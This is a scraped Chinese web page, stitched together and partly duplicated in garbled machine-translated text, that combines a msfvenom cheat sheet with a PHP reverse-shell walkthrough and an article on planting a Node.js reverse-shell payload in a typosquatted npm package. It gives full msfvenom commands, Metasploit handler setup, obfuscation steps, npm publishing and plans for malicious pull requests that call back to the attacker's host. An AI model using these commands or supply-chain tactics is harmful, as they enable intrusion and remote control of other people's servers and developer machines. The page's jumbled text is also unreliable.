快捷搜索:
您的位置:bv1946伟德入口 > 互联网 > Msfvenom学习总结,metasploit框架PHP反向后门建立教

Msfvenom学习总结,metasploit框架PHP反向后门建立教

2019-10-07 18:47

另外,大大多 npm 包都以层级注重关系,你能确认保证您的 package.json 中不容许证明有木马的包,不过你能担保您所信任的包,这一个包的小编,也和你同一警觉,不会忽视?

9.    –i

MSFVENOM实例

12.         普通生成

  1. msfvenom -p <payload> <payload options> -f <format> -o <path>

  2. msfvenom –p windows/meterpreter/reverse_tcp –f exe –o C:back.exe

13.         编码管理型

  1. msfvenom -p <payload> -e <encoder > -i <encoder times> -n <nopsled> -f <format> -o <path>

  2. msfvenom –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:back.exe

14.         捆绑

  1. Msfvenom –p windows/meterpreter/reverse_tcp –platform windows –a x86 –x C:nomal.exe –k –f exe –o C:shell.exe

15.         Windows

  1. Msfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:back.exe

  2. Msfvenom –platform windows –a x86 –p windows/x64/meterpreter/reverse_tcp –f exe –o C:back.exe

16.         Linux

  1. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

17.         MAC

  1. msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

18.         PHP

  1. msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

19.         Asp

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

20.         Aspx

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx

21.         JSP

  1. msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

22.         War

  1. msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

23.         Bash

  1. msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

24.         Perl

  1. msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

25.         Python

  1. msfvenom -p python/meterpreter/reverser_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

metasploit框架PHP反向后门创设

韦德国际1946手机版官网 1

Executable formats:

MSFVENOM常规选项

1.    –p (- -payload-options)

加多载荷payload。

载荷那么些东西比相当多,那些软件正是依据对应的负荷payload生成对应平台下的后门,所以唯有选对payload,再填充精确自身的IP,PORT就能够调换对应语言,对应平台的后门了!!!

(- -payload-options 列出payload选项)

2.    –l

翻开全部payload encoder nops。

3.    –f (- -help-formats)

输出文件格式。

(- -help-formats 列出富有文件格式)

Executable formats:

asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war

Transform formats:

bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

4.    –e

编码免杀。

5.    –a (- -platform  – -help-platforms)

选料架构平台

x86 | x64 | x86_64

Platforms:

windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe

6.    –o

文本输出。

7.    –s

生成payload的最大尺寸,正是文件大小。

8.    –b

制止选拔的字符 举个例子:不使用 ‘f’。

9.    –i

编码次数。

10.         –c

丰裕自身的shellcode。

11.         –x | -k

捆绑。比方:原先有个常规文件normal.exe 能够由此这些选项把后门捆绑到那个程序方面。

Framework Payloads (436 total)

    Name                                                Description
    ----                                                -----------
    aix/ppc/shell_bind_tcp                              Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port                             Spawn a shell on an established connection
    aix/ppc/shell_interact                              Simply execve /bin/sh (for inetd programs)
    aix/ppc/shell_reverse_tcp                           Connect back to attacker and spawn a command shell
别的的大约。
这里要使用的是PHP反向后门
msfvenom -p php/meterpreter/reverse_tcp --payload-options  查看参数
Options for payload/php/meterpreter/reverse_tcp:

       Name: PHP Meterpreter, PHP Reverse TCP Stager
     Module: payload/php/meterpreter/reverse_tcp
   Platform: PHP
       Arch: php
Needs Admin: No
 Total size: 936
       Rank: Normal
Provided by:
    egypt <egypt@metasploit.com>
Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port
Description:
  Run a meterpreter server in PHP. Reverse PHP connect back stager
  with checks for disabled functions
 
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=1234 -f raw >c.php 生成脚本
改造后要将脚本最终面包车型地铁注释符去掉,然后上传到目的服务器上
启动msf
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 1234
exploit 运转监听
 
接下来从浏览器中开采上传的脚本
msf中就能够看出
*] Starting the payload handler...
[*] Sending stage (33068 bytes) to XXX.XXX.XXX.XXX
[*] Meterpreter session 1 opened (192.168.1.2:1234 -> xxx.xxx.xxx.xxx:42280) at
meterpreter >
 
倘若kali安装在设想机上,须要桥接,然后路由器上将kali DMZ到外网

留意:此教程只用于学习应用其余一切结果与本站无前

举个例证,一行简单的代码:

6.    –o

Metasploit简介

隐藏 payload

4.    –e

msfvenom -l  查看全数payload

如图,反向TCP监听已经成功运转:

选择架构平台

灰帽红客(第3版) Metasploit是多个免费的、可下载的框架,通过它能够很轻易地猎取、开拓并对应用软件漏洞施行攻击。它自己附带数百个已知软件漏洞的专门的职业级漏洞攻击工具。当H.D. Moore在二零零二年发表Metasploit时,计算机安全情状也被永恒性地转移了。就像一夜之间,任哪个人都足以改为红客,各样人都能够运用攻击工具来攻击那几个未打过补丁只怕刚刚打过补丁的纰漏。软件商家再也无法推迟发表针对已发布漏洞的补丁了,那是因为Metasploit团队平素都在拼命开荒各类攻击工具,并将它们进献给全部Metasploit客户

经验丰富的观赏鱼类佬都掌握,要钓鱼,是迟早要先做鱼钩的。骇客也要钓鱼,鱼钩是甚?在骇客的世界里,有二个鱼钩店,叫做 msfvenom,专治各样款(架)式(构),各个型(语)号(言)的鱼(机器)。msfvenom 是 metasploit 的一有的,集成在了 Kali 系统之中。在 Kali 的官方网址,有现有的杜撰机镜像,下载了就能够用。

7.    –s

韦德国际1946手机版官网 2

asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war

  1. debug
  2. qs
  3. yargs
  4. request
  5. chalk
  6. form-data
  7. cheerio
  8. gulp
  9. browserify
  10. bower
  11. mongoose
  12. electron
  13. normalize.css
  14. mysql

bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

npm 是共产主义的大粮食仓库,任哪个人都可以进献本身的代码到 npm 上去。然则什么让外人下载大家的代码呢?那是一门高深的学问。

1.    –p (- -payload-options)

此刻,在网线的另三只,一个红客微微一笑:又有一个肉鸡上线了。

编码次数。

有弱口令难题账号所发布的 npm 包,攻下了整站的 14%

Platforms:

肉鸡上线

windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe

下一步干嘛?内网渗透,脱裤,种马,导流……

翻开全体payload encoder nops。

生成 Payload

捆绑。比方:原先有个正规文件normal.exe 能够透过那几个选项把后门捆绑到这么些顺序方面。

那边说一下安插的参数:

8.    –b

1.

载荷这些事物相当多,那个软件正是基于对应的载重payload生成对应平台下的后门,所以独有选对payload,再填充精确自个儿的IP,PORT就足以变动对应语言,对应平台的后门了!!!

来源:HackingSexy

style="font-size: 16px;">

MSFVENOM实例

12.         普通生成

  1. msfvenom -p <payload> <payload options> -f <format> -o <path>

  2. msfvenom –p windows/meterpreter/reverse_tcp –f exe –o C:back.exe

13.         编码管理型

  1. msfvenom -p <payload> -e <encoder > -i <encoder times> -n <nopsled> -f <format> -o <path>

  2. msfvenom –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:韦德国际1946手机版官网,back.exe

14.         捆绑

  1. Msfvenom –p windows/meterpreter/reverse_tcp –platform windows –a x86 –x C:nomal.exe –k –f exe –o C:shell.exe

15.         Windows

  1. Msfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:back.exe

  2. Msfvenom –platform windows –a x86 –p windows/x64/meterpreter/reverse_tcp –f exe –o C:back.exe

16.         Linux

  1. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

17.         MAC

  1. msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

18.         PHP

  1. msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

19.         Asp

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

20.         Aspx

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx

21.         JSP

  1. msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

22.         War

  1. msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

23.         Bash

  1. msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On>-f raw > shell.sh

24.         Perl

  1. msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

25.         Python

  1. msfvenom -p python/meterpreter/reverser_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

 

 

转载:

正片:

生成payload的最大尺寸,便是文件大小。

韦德国际1946手机版官网 3

增进自身的shellcode。

use exploit/multi/handler

10.         –c

红客希图

防止选用的字符 比如:不行使 ‘f’。

2. )

输出文件格式。

得到 shell 真的可以置之不顾一切,独有你意外,未有骇客做不到。

5.    –a (- -platform  – -help-platforms)

为了演示,作者在地头搭了二个 npm 服务器。

x86 | x64 | x86_64

韦德国际1946手机版官网 4

11.         –x | -k

另多少个思路是,做三个通用的 npm 包,譬喻能 log 出多彩颜色的包,然后去给别的的开源项目提 PEvoque:

文本输出。

然后下了一群你都不明了从哪个地方来的 npm 包。

(- -payload-options 列出payload选项)

借使这么些顺序安插到了生育情况服务器,那么骇客将能取得那些服务器的shell权限。

3.    –f (- -help-formats)

msfconsole

(- -help-formats 列出装有文件格式)

好端端的思绪是,做一个和平常 npm 包名字很像的包名,比如 koa-multer,能够做一个koa_multer,然后总有部分人会打错字,下载到包括 payload 的包。那是三个可能率难题,下载 koa-multer 的总的数量越大,下载 koa_multer 的量也越大。

加多载荷payload。

npm 账号的弱口令难点

2.    –l

韦德国际1946手机版官网 5

编码免杀。

大家是在给开源社区做贡献啊!

Transform formats:

混淆

能够列出全数辅助 Node.js 的 payload。这一定于到店里问:首席实行官!小编要买鱼钩!要能钓 Node.js 的这种!主任:好嘞!要哪款?

韦德国际1946手机版官网 6

前端喜欢用 UglifyJS 来减弱代码,但在这一场景下,大概不是最优解。大家用 Java Obfuscator Tool。

复制 payload,打开 Obfuscate,一道菜就形成了。

在此间,我们选用nodejs/shell_reverse_tcp,其实产业界最常用的 payload 是 meterpreter,不过那款鱼钩还没上市:

嗯!分界面彰显 compile successful!很完善的一回编写翻译!你以为是时候显得实在的手艺了!

黑客完全可以把下载 npm 包,伪造代码并颁发这段逻辑自动化。之后,就不光是 koa_multer 的题目了,你须要防守 koa-multe,multer-koa,koa-multer-middleware 等等种种奇离奇怪的 npm 包,还要区分"_"和"-"的分别,当然,也不只是 koa-multer 这一个包,其余兼具的包都能够一成不改变。

sw_vers # 查看操作系统

sysctl -n machdep.cpu.brand_string # 查看操作系统

cat index.js

在 Kali 系统中,输入:

得到那一个包,就足以公布到 npm 源了:

那会儿警觉的前端就能够跳出来怼笔者:胸底,你那代码里又调用 cmd 又调用 /bin/sh,还把攻击 IP 和端口都暴流露来了,傻子才会运维你的代码哦?

npm publish

韦德国际1946手机版官网 7

而 Java 的变化,大概比海贼王里的路飞还要伸缩自如。

韦德国际1946手机版官网 8

黑客那边,立时能博得这么些 shell 的对话:

韦德国际1946手机版官网 9

本身帮你修复了难题 XXX,还丰裕了五彩 logger 的机能!

原标题:笔者是如此黑进你Node.js生产服务器的

那篇文章陈诉了从八个黑客的角度,以渗透前端项目为对象,从转变payload,混淆,遮盖 payload,公布 npm,社会工程学提 POdyssey,运转脚本,反向连接到攻击主机,最后主机得到服务器 shell 的传说。

还没完呢,非凡还在后边。

责编:

理当如此,警觉的人会拒绝这几个PLAND。但那也没涉及,提的 PLAND 多了,总会有人受愚的。

采纳 handler 模块。并在 handler 模块中设置 payload ,攻击主机 IP,攻击主机端口,并运转监听:

韦德国际1946手机版官网 10

能够看看那些包和正确的 koa-multer 差不离同样。假使不追究源码,前端不会发掘本身下载了一个谬误的包。

那当中都发出了什么?

价值观的杀毒软件,是经过检测文件特定字符来分明病毒特征的,而透过修改特征码绕过杀毒软件的检查实验,大家誉为免杀。

Done?

git clone

别急嘛,好戏才刚刚最初。

韦德国际1946手机版官网 11

前端技术员的另贰个口头禅是哪些?npm run dev!

  • -p nodejs/shell_reverse_tcp 指的是我们要用 nodejs/shell_reverse_tcp 这个 payload;
  • LHOST=192.168.199.165 指的是攻击主机的 IP 地址,由于此次攻击是内网演示,所以用了内网 IP 。公网攻击的话,将要配个公网 IP;
  • LPORT=5432 攻击主机这边的监听端口,payload 运维后,被口诛笔伐方会尝试连接攻击主机的那个端口;
  • -o index.js 意思是出口到 index.js 那几个文件中。

一个 npm 包被假冒不荒谬,四个恶意的 PENCORE被不盛名的品类 Approve 也正常。就像三个央浼无法叫攻击,不过几百万的伸手打过来的时候,你就清楚 DDOS 有多可怕。

alert(1)

韦德国际1946手机版官网 12

在 Kali 的 Terminal 里输入:

set payload nodejs/shell_reverse_tcp set LHOST 192.168.199.165 set LPORT 5432 run

由于 npm 包以互相信任的款型存在,由这 14%包引发的安全主题材料,影响到别的的包,侵吞了整站的 54%

[][(![] [])[ []] ([![]] [][[]])[ ! [] [ []]] (![] [])[! [] ! []] (!![] [])[ []] (!![] [])[! [] ! [] ! []] (!![] [])[ ! []]][([][(![] [])[ []] ([![]] [][[]])[ ! [] [ []]] (![] [])[! [] ! []] (!![] [])[ []] (!![] [])[! [] ! [] ! []] (!![] [])[ ! []]] [])[! [] ! [] ! []] (!![] [][(![] [])[ []] ([![]] [][[]])[ ! [] [ []]] (![] [])[! [] ! []] (!![] [])[ []] (!![] [])[! [] ! [] ! []] (!![] [])[ ! []]])[ ! [] [ []]] ([][[]] [])[ ! []] (![] [])[! [] ! [] ! []] (!![] [])[ []] (!![] [])[ ! []] ([][[]] [])[ []] ([][(![] [])[ []] ([![]] [][[]])[ ! [] [ []]] (![] [])[! [] ! []] (!![] [])[ []] (!![] [])[! [] ! [] ! []] (!![] [])[ ! []]] [])[! [] ! [] ! []] (!![] [])[ []] (!![] [][(![] [])[ []] ([![]] [][[]])[ ! [] [ []]] (![] [])[! [] ! []] (!![] [])[ []] (!![] [])[! [] ! [] ! []] (!![] [])[ ! []]])[ ! [] [ []]] (!![] [])[ ! []]]((![] [])[ ! []] (![] [])[! [] ! []] (!![] [])[! [] ! [] ! []] (!![] [])[ ! []] (!![] [])[ []] (![] [][(![] [])[ []] ([![]] [][[]])[ ! [] [ []]] (![] [])[! [] ! []] (!![] [])[ []] (!![] [])[! [] ! [] ! []] (!![] [])[ ! []]])[! [] ! [] [ []]] [ ! []] (!![] [][(![] [])[ []] ([![]] [][[]])[ ! [] [ []]] (![] [])[! [] ! []] (!![] [])[ []] (!![] [])[! [] ! [] ! []] (!![] [])[ ! []]])[! [] ! [] [ []]])()

接下去要做的工作是,等。就像钓鱼同样,必要耐心。

msfvenom -l | grep node

韦德国际1946手机版官网 13

指令,能够看来 payload 长什么样。

韦德国际1946手机版官网 14

进去 metasploit 的调整台。然后输入:

之所以,让大家祝愿 npm 永世幸运✨吧。

敲完指令之后,大家得以在当前目录得到贰个名称为index.js 的 payload,相当于大家刚买到的鱼钩。payload 十分小十分的小,只有 803 字节。用

韦德国际1946手机版官网 15

韦德国际1946手机版官网 16

以 koa-multer 为例,我们先把代码 clone 下载下来。

后面一个程序猿的口头语是吗?npm install!

Note:本文意在交换探究,小编没有渗透过其余系统。如基于本文观念实行渗透,读者须自行承担风险和权力和权利。小编不担任其余权利。

那就表示,你每 npm install 一回,就能够有二次安装到不安全的包。那不是心有余悸。大名鼎鼎 koa.js,公布的密码是 "password";react、gulp等歌手项目也沦落弱口令深渊。上边罗列部分另外受弱口令难点影响的 npm 包,相信总有您掌握的名字:

把大家调换的 payload 复制到项目路径下,并在 index.js 中引进这些文件。

把 package.json 和 README.md 里全体的 koa-multer 改成 koa_multer,并在 package.json 的 files 评释 payload 的文本名,大家就搞好了二个暗含 payload 的 npm 包。

此时警觉的前端技术员会跳出来怼小编:你那包一看就明白是骗人的,笔者决然不会蠢到安装这种包!

用 jsfuck 能把它变得连阿妈都认不出来:

最近儿深夜就远非人类能读懂这段代码了,混淆义务完结。

如此看来,npm 到前天都没发生过大面积的安全性难题,纯属是时局好……

什么生成大家的 payload 呢,输入:

黑客那边,供给预备好 handler。

那时,小白鼠跑了 koa_multer 里的 demo 代码!

韦德国际1946手机版官网 17

其一命令从 npm 宾馆中下载一群从品类 package.json 中宣示的信赖,下载完注重后,再下载重视中 package.json 注脚的借助,下载完注重的依赖性后,再下载信任中 package.json 表明的凭仗中的 package.json 评释的依赖,下载完重视后…………

别急,还会有另外形式。

msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.199.165 LPORT=5432 -o index.js

在 2017 年 7 月份,有人对 npm 的账号做了一遍弱口令检查实验,检查测量检验结果是:

韦德国际1946手机版官网 18

在此地,黑客获得了开发银行该 Node.js 程序的客商权限,能够实践别的该客商同意实践的吩咐。举例,红客想看被攻击主机的操作系统,查看 CPU 型号………

TL,DR:

韦德国际1946手机版官网 19

理所必然我们不要 jsfuck,因为混淆过后的代码太大了。

韦德国际1946手机版官网 20

参照他事他说加以考察文书档案:

尽管再小心,再小心,总有您放在心上不到的地点。就好像刀剑不入的阿喀琉斯,也可能有脚后跟中箭的一天。

本文由bv1946伟德入口发布于互联网,转载请注明出处:Msfvenom学习总结,metasploit框架PHP反向后门建立教

关键词: